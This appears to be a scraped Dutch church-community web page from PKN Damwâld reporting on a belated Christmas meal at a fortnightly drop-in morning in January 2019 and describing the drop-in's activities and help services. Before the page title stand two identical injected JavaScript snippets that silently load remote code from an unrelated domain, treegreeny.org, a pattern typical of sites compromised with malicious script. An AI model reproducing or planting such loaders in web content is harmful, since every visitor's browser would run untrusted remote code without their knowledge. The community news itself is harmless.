;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inloopochtend It Trefpunt - PKN Damwâld

Inloopochtend It Trefpunt

Gepubliceerd op: dinsdag 22 januari 2019

It Trefpunt-Verlate Kerstmaaltijd

Een paar keer per jaar organiseren wij een maaltijd aan het einde van de inloopochtend. Het was de bedoeling om ook deze keer vlak voor Kerst met elkaar te eten. Tegen die tijd bleek echter, dat bijna iedereen al  1 of meerdere diners in de agenda had staan. In overleg hebben wij onze maaltijd opnieuw gepland en wel op 17 januari. Deze zogenaamde “kerst” maaltijd bestond uit warm eten (voor het eerst) , namelijk uit 3 soorten stamppot van onze enige echte plaatselijke groenteman, met daarbij worst, uitgebakken spekjes en gehaktballen. Klaas en Maaike en het personeel hebben er een ware traktatie van gemaakt en dat niet alleen, ze hadden de hoeveelheid eten voor 47 personen prima ingeschat. Geweldig en hartelijk dank!! Ook dank aan alle vrijwilligers, niet alleen voor deze keer, maar ook voor al die keren het afgelopen jaar dat jullie klaarstonden.

Als organisatie kijken we, met dank aan alle gasten, terug op een zeer geslaagde ochtend. Helaas waren er nog 5 gasten afwezig door ziekenhuisopname en griep. Deze keer net geen nieuw record van meer dan 50 deelnemers. Wie weet een volgende keer want wij gaan gewoon door, en bent u nog niet geweest, dan hopen wij u binnenkort te verwelkomen.

Eerstvolgende inloop op donderdag 31 januari 2019 vanaf 9.30 uur.

1 keer in de 14 dagen, op donderdagochtend, is er Inloop vanaf 09.30 uur. In het voorjaar van 2016 zijn wij hiermee gestart en het is een groot succes. Iedereen, oud of jong en kerkelijk of niet, is van harte welkom. Er is gratis koffie/thee/fris en u kunt de krant lezen, spelletjes doen of gezellig met elkaar praten. We hebben ook veel boeken en tijdschriften die u kunt meenemen. U mag ook eigen boeken inleveren. Regelmatig is er tijd voor het maken van (wens) kaarten of bloemstukjes of voor schilderen en kwissen. Kapotte (elektrische) spulletjes meenemen voor ons repaircafe mag, indien u geen financiële of andere mogelijkheden heeft om die te laten maken. Wij bieden hulp bij moeilijke (financiële) brieven en vervoer als u naar de Inloopochtenden wilt of ergens anders naar toe moet bijv. het ziekenhuis. Voorlichting, over Zorg en WMO, krijgt u van het Friese Land, Zorgcombinatie Interzorg of de Buurtzorg. Medewerksters van die organisaties zijn om beurten aanwezig.
Heeft u vragen, wilt u ergens gebruik van maken: koopschaafsma@hotmail.nl tel. 613765741